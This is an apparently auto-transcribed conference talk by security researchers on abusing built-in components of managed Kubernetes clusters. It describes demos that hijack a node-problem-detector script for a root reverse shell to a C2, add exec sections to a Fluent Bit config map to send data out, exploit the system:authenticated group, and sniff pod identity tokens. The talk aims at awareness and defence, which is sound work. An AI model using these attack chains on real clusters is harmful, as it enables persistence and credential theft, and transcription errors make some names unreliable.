 Hello, everybody. Bonjour. Thanks for sticking around. Welcome to our session living of the land techniques in managed Kubernetes clusters. My name is Shea Berkovitz. I'm proud to be a part of amazing with threat research team. You might know us from these projects and with me today. And I'm Ronan Shustin. I'm from the WIS vulnerability research team and you might know us from cool researchers like broken sesame, Bing Bang and many more. All right, so what are we talking here today? Living of the land techniques. Let's go to basics. Let's start with the definition. Miriam Webster dictionary defines living of the land as getting food by farming, hunting, etc. Okay, we know that but there is this element of using what's available in the environment. And that's so true for classic cybersecurity definition, right? Albeit in a classic definition, it's talking more about binaries, binaries on the host, right? So those two big projects, GTFO beans, LoL bus projects that pretty much a list, categorized list and collection of the binaries that can be exploited by the attackers once they have the initial access on the host. Okay, so my favorite from the OSCP days for those in the know was the search detail, which I used to download enumeration scripts from to my Windows host. In the absence of Coral or Wget, for example, that's classic example. And that's fine. That was okay back then when when we said initial access and attacker, we thought about VM or host perhaps after escaping some kind of application, web application, right? Finding the RC. However, this has changed right now. Attacker might find themselves in different contexts. It can be pod within the Kubernetes. Of course, it can be node. It can perhaps even be lambda function, right? They might own the lambda function in the cloud. Okay, so as the definition of attack chain and the attack processes has evolved, so should the definition of living on the land techniques evolve? Just like the metapod Pokemon. Okay, so for the definition, for the updated definition, I want to take you to the CISA join guidance. So they released it in February 10th, if I'm not mistaken. So pretty much a month ago, CISA and allied agencies released the guidance for on-prem and cloud living of the land techniques. And even though they released it past our CFP submission and acceptance, we thought it's going to be a shame not to include it because what they found there, their thoughts really resonated with us. So let's take their definition. Native tools and processes on systems. I would also add work flows and second point is lower likelihood of being detected or blocked. Okay, so I think those are two important points that describes together the definition. But now, what makes living of the land techniques, let's say, model techniques different from other attack scenarios? Well, there are three points. First, there's a lack of established baselines on the defense side. Second, the lack of conventional IOCs. And third, it just makes attackers job easier, right? Because they avoid, they don't need to develop their own tools. They just use whatever they have. So altogether, it makes a real problem to recognize, to detect, model techniques. Okay, specifically in Kubernetes clusters. Now, CISA guidance talks about cloud and on-prem, which is a shame because we're at KubeCon. So we want to extend it to Kubernetes. Not just extend, but also enumerate. So we'll present a series of demos about those techniques to persuade you that this is a real problem, that there are multiple techniques are there. And we'll try to standardize them somehow. For standardization, we'll use threat metrics. Don't worry, not this one. We'll focus on the Kubernetes threat metrics, okay? Now, when they're talking about threat metrics, which stages of the threat metrics, the model techniques are actually applicable to. Pretty much all the stages, like beside the initial access, pretty much everything may be an impact. It's pertinent to model techniques. They can be abused anywhere. Why manage clusters? Why are we talking about manage clusters specifically? Well, using the academic language is because they have a lot of stuff. Okay, default AKS cluster, empty cluster that you stage. It has all these workloads running. You see there are like three namespaces, a bunch of workloads. So we can abuse this, right? Additional services means more complexity, means increased attack surface. It's always true. And we love attack surface as security researchers. Okay, where can we take the model techniques? Well, of course, attackers in the typical scenario, attackers find themselves in the execution into the pod, right? Like some kind of application they see, they find, they execute in the pod, so there's a pod image binaries. But it's not very interesting. It can be sent to us, which is huge, but it could be also distro less, which doesn't even have shell. And so there's a huge variance in the, in the model binaries that attackers might find there. But how about Kubernetes node image? That's more stable. You can see in EKS, GKS, AKS, all their AMIs pack tons of tools, useful tools, in this case, for just to download something from the internet. Do you really think Kubernetes worker node needs SFTP? I'm not sure. I don't know, but it's there, so we might use it. Okay, but this assumes that the attacker has Kubernetes node access, which not always true, of course. Okay, then what else can we use? We can use middleware workloads. Deployments, staples, set Kubernetes object. Diamond sets even better. Why? Because they run on every pod. So it doesn't matter where attacker finds themselves, they can use that workload. Also, cron jobs, jobs, which is great. Why? Because they are periodic in nature. But also users and groups, and the various managed solutions, they add their own users and groups on top of what vanilla Kubernetes cluster already has. And even core control plain functionality, which we're not going to talk today, but there's been a research around how to use, for example, Kubernetes API server for CSRF. Okay, let's dive into the specific use cases. We'll start with the persistence. For this, we'll use our shackle Pokemon, which is a symbol of persistence, of course. So as a symbol of persistence, we'll abuse the node problem detector. Now, for those of you who never heard about node problem detector, it's a tool that presents on all GKE and AKS clusters. In fact, it's a system deep process on the worker nodes. It can be installed as a diamond set as well. And it's also installed on many EKS clusters because it appears in the recommendation on the best practices guide, where they say go install it as a diamond set. This process, it performs various diagnostic activities. It runs as root on the node. And make sure the health of the node is fine by performing various activities. So let's focus on the GKE. Let's see how it looks on the GKE. If you run PSA UX on the worker node, this is what you get. You get the NPD process with a bunch of dash-config configurations and a bunch of those JSONs. What are those JSONs saying? They're saying what to do, what diagnostics action to perform. So in this case, CCTL monitor JSON says every six hours, I hope you see the fourth line, every six hours, run this Python with the following parameter. Okay, good. As an attacker, we immediately say, what can we do if we override this JSON? Well, not much because you still need to restart the node problem detector to get the new config. And that may be a bit noisy. However, what can we do if we manage to override the Python? Right? So you see where I'm going with that. Before we put together a demo in the tag chain, quickly I want to talk to you about leaky vessels, which was a set of vulnerabilities. Who here heard about leaky vessels? Yeah, okay, so I'll be very, very short. Set of vulnerabilities, run, see, build kit, allows attackers to build time escape and contain a run time escape. Okay, and that's what we're going to use in the demo. So now we can put together a tag chain. Attacker uses compromised image, poisoned image, you name it, uses leaky vessels to escape on the node. We override as an attackers the Python, the CCTL monitor Python, and we'll let node problem detector to pick the new and execute the new Python. The new Python will communicate with the C2 server. What will we achieve by this? We'll bypass kubot it, we'll bypass admission controller, of course, because we're not going through the Kubernetes API access. That one is blind to our actions. We'll probably bypass sensor EDR solution. Why? Because we're piggybacking on a known process. Privilege escalation, persistency, evasion. Okay, let's see this in action. Okay, so on the left side I have access to the pod. That's a GKE pod. And Andy Dufresne is my hacking pod that has execution on the node. That's the only person, purpose. So I'm showing you that the host name of the node is GKE Shea something. That's our worker node. And now I'm showing you the content of that CCTL monitor JSON. You see the location, NPD custom plugin slash config. That's on the node. And now I'm showing you the content of the CCTL monitor Python that we will overwrite. Now it's not very interesting. It's just diagnostic pod that node problem detector runs periodically every six hours. It's okay, but we will overwrite it. That's the interesting part. How will we overwrite it? By using the malicious image. So unsuspecting cluster operator will run this innocent image called CVE 2024 21626. This image in the bottom right corner, as you can see. Uses this work there. It's abuses the leaky vessels run see vulnerability. It has only one command. It overwrites the existing CCTL monitor that pi on the node. You see that path traversal slash home slash Kubernetes with our own CCTL monitor pi, which what it does. Just a good old Python reversal to our C2 server. At the bottom top corner at the top right corner, you see our C2 server running on port 4444. And now cluster operator is running the starting the image and it's done. You see leaky completed. Okay, something happened. So it pulled the image. So I guess it worked, but of course we need to check. So let's see how the actual Python looks like. I'm dumping the Python. And you can see that this is a new Python code. Okay, so leaky vessels worked. Good, now what we need to do, we just need to wait for six hours for the reversal connection. Of course I trimmed the video. So now any moment now, there we go. We have the connection on the C2 server. The connection is a root on the worker node. You can see the hostname, the hostname of the worker node. We have access to all the processes, including the node problem detector by itself. We don't have any namespace restrictions. And we have access to our libcubelet where, of course, cubelet keeps all the information about local pods, including service account tokens, et cetera. So pretty cool if you ask me. All right, so that's persistency. Let's move on to collection. Collection for people who are into the Pokemons. I think Paragon is the one that represents the collection. Information assembly. So I hope you see where I'm going with it. Fluent bit, okay. Fluent bit is a very known log management processor and management solution. We love it because it's installed by default on GKE and AKS. And it's recommended for installation on EKS BP guide as well. The configuration affecting the Fluent bit is going through the config map, fluent-bit-config. And this config looks like this, looks as follows. There's a sequence of input, parser, filter commands, sorry, sections, which tells Fluent bit what to do, which logs to assemble and where to send them. Now, as an attacker, we immediately ask ourselves, okay, if we can modify it, what happens? Good things happen. Because we can use exec plugin. As an attacker, of course, we love plugins that's called exec because they do exactly that. They execute the commands. So in this case, this is an example from the official documentation of the Fluent bit where ls slash var slash log will execute every one second. Okay, how can we abuse it? So here's our attack chain. Assuming we have update on the config map permissions, okay, or more, or more powerful permissions, but that's the artwork that we need. We will add input session and output session, sections to the config map, and we will let new Fluent bit pods to get the new config map and to send the logs to C2. That takes filtration. And again, we bypass Q-body, we bypass Q-admission controller, we bypass sensor, and our malicious config map is resistant to restarts because now it resides in its CD. So again, we achieve collection, we achieve persistency, we achieve evasion. Okay, let's see this in action. I hope you can hear me because the noise is quite serious there. Okay, so on the left, you see that I'm running two Fluent bit pods because it's a demon set. I have two nodes. Now I'm showing you the config map that's affecting the Fluent bit config. It's called Fluent-bit-config. And by the way, this is EKS cluster. I guess you can see this by Amazon-cloudwash namespace. Now this is the content of this config map. It's pretty messy when unformatted, but it starts with application-log.conf and it defines the collection of certain application logs. But I want to show you our malicious Fluent bit config that is very similar to original config. However, it adds two small sections. It abuses that exact plugin that I was talking about. Input, output. In the input, we're asking Fluent bit, please execute hostname and id and ls-la. Every five seconds, we control the interval and send it to our C2 server on port 4444 over plain HTTP. That's it. So now I'm starting my C2 server Python server and applying the new config map and hoping that it'll work. So nothing happened. Why? Because the pods still haven't applied the new config. Right? So here I'm killing the pod on purpose, the second pod. I'm going to kill it. And because it's a demon set, the new pod will respond and pick the new configuration. In the production cluster, however, there is a potential process of shrinking and growing. So every new node that comes up because of the scheduling or load, they will pick the new config, the malicious config. All right. So now I'm deleting the pod and I expect the new pod to start automatically. There it is. The last pod, you see five seconds? That's the new pod. So now any moment now, we're getting the information. We're getting the output of fluent bit running those shell commands. You can see the first one is exact. The second one is hostname. Sorry, the first one is hostname. Second one is ID. And then the output of that. And you see the user agent is fluent bit. And fluent bit is so nice that it's packing. It's in a nice JSON. Time stamps every command that it's running. So because it's, of course, lock management solution. Right. And at this point, I'm passing to Ronan for privilege escalation. All right. Thank you, Shai. So now we'll talk a bit about privilege escalation techniques. So from CISA's guidance, they show us basically a lot of privilege escalation techniques on cloud environments. However, of course, we are at KubeCon and we are interested in managed clusters. So let's see how we can use those privilege escalation techniques and apply those on managed clusters. So the first example we chose to show you today is the Azure Kubernetes service and more specifically how we can use the entry ID authentication combined with some user misconfigurations in our advantage. So let's first see how many different authentication and authorization methods EKS offers. So the first one is local accounts with Kubernetes role with access control. Basically, the one we all know. The second one is the entry ID with the Kubernetes role with access control basically maintaining the authorization model. And the third one is the entry ID authentication, but this time it is combined with the Azure role with access control, which is Azure's own controls, which are not explicitly unique to the Kubernetes. It also supports many other services. So in the next few slides, we'll focus only on clusters which are configured with the entry ID authentication. So let's imagine we are a regular user and we want to perform some kind of operations in our cluster. How will it look like? So we first have to perform a login to our identity provider. In our case, it's the entry ID. Next, we'll receive a token which we'll then use against our Kubernetes cluster. If you use the Azure CLI or other things, your cube cuddle already should be ready to do so automatically. So then we'll perform our operation with the token and actually behind the scenes, it will perform the authentication against an external webhook server, which will then validate the GWT token, perform the Microsoft API graph for various user details and return it back to the Kubernetes API server, which will now have to authorize the request in some cases. And there are also another external webhook server which is responsible for the authorization. But if, for example, the Kubernetes API server authorizes the request, then it will also perform the request and return the data back to the user. Now, I think the most interesting part in this section is we're still authenticating with the entry ID. And it means that basically every server's principle, every user in our directory, which directory is basically equivalent to tenant, will be able to authenticate to our cluster. Now, it doesn't mean there will be automatically granted to perform any operations around cluster, but they'll still be authenticated. And let's keep that in mind in the next few slides. So let's imagine we somehow obtained random server's principal credentials in our directory. How will it look like when we want to authenticate to perform some kind of operations on a cluster which is configured with the entry ID? So we first will use those credentials and we'll have to generate a token which we'll then use against our cluster. And we can do this with the curl command. Next, we'll use kubectl against our cluster and, for example, perform the get secret operation. And, of course, we've been denied because we're not authorized to perform any operation. And however, let's see what do the lock shows behind the scenes. So we can see the response status, basically the same error we received before. But let's focus on the user section and, more specifically, on the groups. So we can see that we are part of the system authenticated group. We are a random user in our directory. It's part of the system authenticated group which basically groups all the authenticated identities. And now why is it even interesting for us? So we've seen many cases that cluster administrators tend to trust the system authenticated group and bind to it roles which may contain higher privileges. So this basically combined with your ability to authenticate to a cluster configured with the entry ID can be an open door for proliferation and lateral movement techniques. Now, finally, Jiki also behaved the same. I think a couple of months ago, security researchers found that every Google account could authenticate to any GKE cluster and be also part of the system authenticated group and they also found the same result that many users tend to trust the system authenticated group and bind to it a role which may contain higher privileges. So now let's see a short demo on how it works. All right, so excuses for the small font. So let's say we have a cluster which is configured with the entry ID authentication and we have a cluster all binding which binds the power for all to the system authenticated group. Basically grants us pod, get pod, list pods and all those stuff, let's secrets. And now we'll use a random service principal credentials to generate a token which will be and then used against our Kubernetes cluster which is configured with the entry ID. Then we'll use the token for example to perform the get deployments operation and we can see that of course we've been denied because we are not authorized to perform the operation but let's see what actually we can do and we can see that we can get pods, list pods and list secrets because we are indeed part of the system authenticated group. So let's try and use our permissions now to get those resources. All right, so that's basically it for the demo and now we'll talk about AKS pod identity. So for those who are not familiar with the AKS pod identity, it's a new feature AWS released a few couple months ago also and basically helps bridging access of service accounts to AWS resources. Now in the next few slides we'll see an example of how we can use the pod, the AKS pod identity in our advantage using the host network through configuration. So let's see at a very high level how it works. I won't really get into details. So after installing the AKS pod identity add-on on our cluster, we're introduced with two new endpoints. The first is a pod identity web book and the second one is a demon set called AKS pod identity agent which actually serves as an identity role feature, let's say. So from now on each pod which is configured with a service account that wants to have an access to AWS resources and is configured to have a role will actually perform an HHP request to the AKS pod identity demons at which sits on the same working node and will basically ask it to fetch the necessary role. And of course it will do that and it will return the role to the pod and then it will be able to access its configured AWS resources. So now let's see how we can use that with the host network through configuration as a possible attacker. So let's say we have a working node which contains two pods. The first pod is pod A which contains the host network through configuration for those who are not familiar with what is host network through configuration. It basically allows the pod to access the network adapters of the worker node with the right capabilities. It also allows a network capture of all the traffic from the worker node. Let's assume the malicious actor was able to get access to pod A and next we'll have pod B which will happen to have a service account which has access to S3 buckets. Now the slide before I told you that to have an access now for those resources it first has to send a request behind the scenes to the EKS pod identity agent which sits on the same working node and then it will receive the necessary token that will allow it to access the S3 buckets. Now because from pod A we have the capability to perform a network capture we can possibly capture the token received from the EKS pod identity to pod B because the traffic between them is HTTP and not HTTPS. So now let's see a demo on how it works. All right so on the left side we'll create a pod which will have the host network through configuration and basically allow an attacker to perform a network capture. We'll also have another pod which we'll call a bucket reader which will have a service account which is configured to have access to an S3 bucket and we'll try to simulate the for example the STS get caller identity to basically show us what role do we have and behind the scenes it should perform a request to the EKS pod identity and receive its role. On the right side we'll now perform the network capture and then we'll see that we are able to capture the response from the EKS pod identity agent and receive the token. So we can see that we were able to basically receive the token from the EKS pod identity by a network capture and now we can use that for example from pod A which is an attacker to access the identity and possibly the S3 bucket of pod B. So now I'll pass the mic back to Shai to conclude our presentation. Thank you. Thanks Renan. So that was a privilege escalation from the Kubernetes into the cloud. So I guess impact is also one of the stages that impacted by the live and all the LAN techniques. All right so I hope we persuaded you that there's a real problem out there in managed Kubernetes clusters. And we need to do something about it. What can we do though? Well how about we start with awareness? How about we update the threat metrics to include live and all the LAN components such as node problem detector, flu and B it and there are others as well that we didn't include in the presentation. That's a good first step. But maybe we can do more. We're planning to create a project, a GitHub or website that will collect those techniques something like a lull bus project. Maybe kube lulls. If you have funny little witty name that you want to suggest for this project, Pingas will be happy to hear that. Also we would love to encourage the CSPs to publish whatever they have in the managed clusters. K-Bom or call it any other word but ultimately the users want to know what they run in the clusters. Okay right now that's not the situation. Think about vulnerability management. How can we trace? How do we know in which clusters, which versions we have vulnerable component? We don't. So this is not everything but I think this is a good several steps towards solving the problem. Towards that same baseline that CISA guidance talks about. But we probably don't really understand what the baseline looks like. But it just steps into the right direction I think. Okay this is all we have for today. Thank you all for attending. If you have questions feel free but we're going to hang around here as well. Thank you. Thank you very much. Hello. I have a question. You showed a nice example with the fluent bit but generally whatever solution do you use for logs? The current situation in Kubernetes is that it's always going to be a high-privileged pod. Logs are generally just reading a stream of text right? So is there really a need to have a high-privileged pod for such a simple use case? And are you aware of any work in Kubernetes ecosystem to change that architecturally? Well it's not really a high-privileged pod. It's just the fluent bit actually has just sensitive mappings into varlib, kubelet in order to collect the logs. So it's not high-privileged. It just exfiltrates the data right? And the key here is just to understand the risks in your managed clusters. Let's say CSPs providers that don't tell us that if you give config map update permission to somebody else that can lead to the whole cluster compromise. They don't say it right? But it's true. It's the reality. So I think that's the knowing those risks is a good first step. But I agree. I don't think everything can be non-privileged. Okay. Thanks. Thank you.